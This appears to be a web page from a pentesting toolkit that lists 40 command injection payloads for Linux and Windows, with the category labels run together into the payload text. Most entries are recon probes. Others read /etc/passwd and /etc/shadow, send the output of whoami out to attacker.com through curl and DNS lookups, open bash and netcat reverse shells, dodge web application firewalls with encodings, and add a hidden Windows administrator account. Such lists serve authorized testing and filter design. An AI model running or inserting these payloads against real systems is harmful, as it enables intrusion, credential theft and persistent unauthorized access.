cmd-injection
root@sovietghost:~/tools/cmd-injection#
40 command injection payloads — Linux, Windows, blind, WAF bypass. Authorized testing only.
40 payloads
; idLinuxLinux
; id| idLinuxLinux
| id|| idLinuxLinux
|| id& idLinuxLinux
& id&& idLinuxLinux
&& idbacktick idLinuxLinux
`id`$() subshellLinuxLinux
$(id); cat /etc/passwdLinuxLinux
; cat /etc/passwd; whoamiLinuxLinux
; whoami; uname -aLinuxLinux
; uname -a& whoamiWindowsWindows
& whoami| whoamiWindowsWindows
| whoami|| whoamiWindowsWindows
|| whoami&& whoamiWindowsWindows
&& whoami& ipconfigWindowsWindows
& ipconfig& type win.iniWindowsWindows
& type C:\Windows\win.inicmd /c whoamiWindowsWindows
; cmd /c whoamiPowerShell Get-ProcessWindowsWindows
& powershell -command Get-Processsleep 5BlindLinux
; sleep 5ping -c 5 127.0.0.1BlindLinux
; ping -c 5 127.0.0.1curl out-of-bandBlindLinux
; curl http://attacker.com/$(whoami)DNS exfilBlindLinux
; nslookup $(whoami).attacker.comping -n 5BlindWindows
& ping -n 5 127.0.0.1WAITFORBlindWindows
& WAITFOR /T 5 foo 2>nulIFS bypassWAF BypassLinux
${IFS}idⓘ uses $IFS instead of space
Brace expansionWAF BypassLinux
{id}ⓘ bash brace expansion
Newline separatorWAF BypassLinux
idⓘ %0a in URL-encoded context
Tab separatorWAF BypassLinux
idVariable in cmdWAF BypassLinux
i${z}dⓘ $z is empty, eval to id
Base64 evalWAF BypassLinux
$(echo aWQ= | base64 -d)Hex char evalWAF BypassLinux
$(printf '\x69\x64')ⓘ hex-encoded 'id'
Wildcard expandWAF BypassLinux
/???/i?ⓘ /bin/id via glob
URL encoded ;WAF BypassBoth
%3Bidⓘ URL-encoded semicolon
Double URL ;WAF BypassBoth
%253Bidⓘ double-encoded
id;ls /ChainedLinux
; id; ls /env dumpChainedLinux
; envRead shadowChainedLinux
; cat /etc/shadowReverse shell bashChainedLinux
; bash -i >& /dev/tcp/attacker.com/4444 0>&1Reverse shell mkfifoChainedLinux
; mkfifo /tmp/f; nc attacker.com 4444 </tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/fNet user addChainedWindows
& net user hacked P@ssw0rd /add & net localgroup Administrators hacked /add